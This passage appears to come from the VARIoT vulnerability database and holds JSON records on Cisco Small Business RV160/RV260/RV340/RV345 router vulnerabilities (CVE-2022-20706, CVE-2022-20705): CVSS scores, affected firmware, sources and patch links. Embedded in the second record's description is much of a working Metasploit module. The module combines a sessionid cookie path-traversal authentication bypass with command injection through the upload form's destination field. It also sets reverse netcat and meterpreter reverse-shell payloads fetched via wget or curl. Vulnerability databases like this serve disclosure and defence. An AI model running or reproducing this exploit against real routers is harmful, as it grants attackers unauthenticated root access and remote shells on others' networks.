                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2022-20706",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20706",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.1,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20706",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20706",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20706",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20706",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20706",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20706",
                "trust": 0.7,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-167",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20706",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20706",
            "trust": 4.0
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-418",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15774",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "id": "VAR-202202-0321",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T22:04:59.286000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=183259"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 1.8,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-418/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20706"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "date": "2023-05-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "date": "2022-02-10T18:15:09.360000",
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "date": "2023-05-08T08:12:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "date": "2022-02-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "date": "2024-11-21T06:43:22.427000",
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0325

    Vulnerability from variot - Updated: 2024-11-23 22:04

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV series router Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below. }, 'License' => MSF_LICENSE, 'Platform' => ['linux', 'unix'], 'Author' => [ 'Biem Pham', # Vulnerability Discoveries 'Neterum', # Metasploit Module 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb ], 'DisclosureDate' => '2021-11-02', 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'References' => [ ['CVE', '2022-20705'], # Authentication Bypass ['CVE', '2022-20707'], # Command Injection ['ZDI', '22-410'], # Authentication Bypass ['ZDI', '22-411'] # Command Injection ], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'BadChars' => '\'#' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'Payload' => { 'BadChars' => '\'#' }, 'CmdStagerFlavor' => [ 'wget', 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'MeterpreterTryToFork' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path', '/']) ] ) end

    # sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 def generate_session_id return Rex::Text.rand_text_alphanumeric(16) end

    def check res = send_request_cgi({ 'method' => 'GET', 'uri' => '/upload', 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id } }, 10)

    # A proper "upload" will trigger file creation. So the send_request_cgi call
    # above is an incorrect "upload" call to avoid creating a file on disk. The router will return
    # status code 405 Not Allowed if authentication has been bypassed by the above request. 
    # The firmware containing this authentication bypass also contains the command injection
    # vulnerability that will be abused during actual exploitation. Non-vulnerable
    # firmware versions will respond with 403 Forbidden. 
    if res.nil?
      return CheckCode::Unknown('The device did not respond to request packet.')
    elsif res.code == 405
      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
    elsif res.code == 403
      return CheckCode::Safe('The device is not vulnerable to exploitation.')
    else # Catch-all
      return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
    end
    

    end

    def execute_command(cmd, _opts = {}) res = send_exploit(cmd)

    # Successful unix_cmd shells should not produce a response. 
    # However if a response is returned, check the status code and return
    # Failure::NotVulnerable if it is 403 Forbidden. 
    if target['Type'] == :unix_cmd && res&.code == 403
      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
    end
    
    if target['Type'] == :linux_dropper
      fail_with(Failure::Unreachable, 'The target did not respond') unless res
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
      begin
        body_json = res.get_json_document
        fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
      rescue JSON::ParserError => e
        print_error("Failed: #{e.class} - #{e.message}")
        fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')
      end
    end
    
    print_good('Exploit successfully executed.')
    

    end

    def send_exploit(cmd) filename = Rex::Text.rand_text_alphanumeric(5..12) fileparam = Rex::Text.rand_text_alphanumeric(5..12) input = Rex::Text.rand_text_alphanumeric(5..12)

    # sessionid utilized later needs to be set to length
    # of 16 or exploit will fail. Tested with lengths
    # 14-17
    sessionid = Rex::Text.rand_text_alphanumeric(16)
    
    filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. 
    pathparam = 'Configuration'
    
    destination = "'; " + cmd + ' #'
    
    multipart_form = Rex::MIME::Message.new
    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
    multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))
    
    # Escaping "/tmp/upload/" folder that does not contain any other permanent files
    send_request_cgi({
      'method' => 'POST',
      'uri' => '/upload',
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
      'headers' => {
        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
      },
      'data' => multipart_form.to_s
    }, 10)
    

    end

    def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 120) end end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0325",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv340",
            "scope": null,
            "trust": 2.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          }
        ],
        "trust": 1.4
      },
      "cve": "CVE-2022-20705",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2022-20705",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2022-20705",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.4,
                "userInteraction": "NONE",
                "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20705",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20705",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20705",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2022-20705",
                "impactScore": 3.6,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "ZDI",
                "id": "CVE-2022-20705",
                "trust": 1.4,
                "value": "HIGH"
              },
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20705",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20705",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20705",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20705",
                "trust": 0.7,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-166",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20705",
                "trust": 0.1,
